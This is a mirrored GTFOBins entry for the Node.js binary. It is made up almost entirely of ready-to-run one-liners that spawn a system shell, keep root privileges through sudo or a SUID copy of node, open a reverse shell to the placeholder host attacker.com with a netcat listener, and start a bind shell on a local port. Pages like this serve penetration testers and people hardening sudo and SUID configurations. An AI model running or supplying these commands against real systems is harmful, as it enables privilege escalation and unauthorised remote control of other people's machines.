mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-10-23 00:57:56 +02:00
34 lines
1.2 KiB
Markdown
34 lines
1.2 KiB
Markdown
---
|
|
functions:
|
|
execute-interactive:
|
|
- code: |
|
|
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
|
sudo-enabled:
|
|
- code: |
|
|
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
|
suid-enabled:
|
|
- code: |
|
|
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
|
reverse-shell-interactive:
|
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
|
code: |
|
|
export RHOST=attacker.com
|
|
export RPORT=12345
|
|
node -e 'sh = require("child_process").spawn("/bin/sh");
|
|
net.connect(process.env.RPORT, process.env.RHOST, function () {
|
|
this.pipe(sh.stdin);
|
|
sh.stdout.pipe(this);
|
|
sh.stderr.pipe(this);
|
|
});'
|
|
bind-shell-interactive:
|
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
|
code: |
|
|
export LPORT=12345
|
|
node -e 'sh = require("child_process").spawn("/bin/sh");
|
|
require("net").createServer(function (client) {
|
|
client.pipe(sh.stdin);
|
|
sh.stdout.pipe(client);
|
|
sh.stderr.pipe(client);
|
|
}).listen(process.env.LPORT);'
|
|
---
|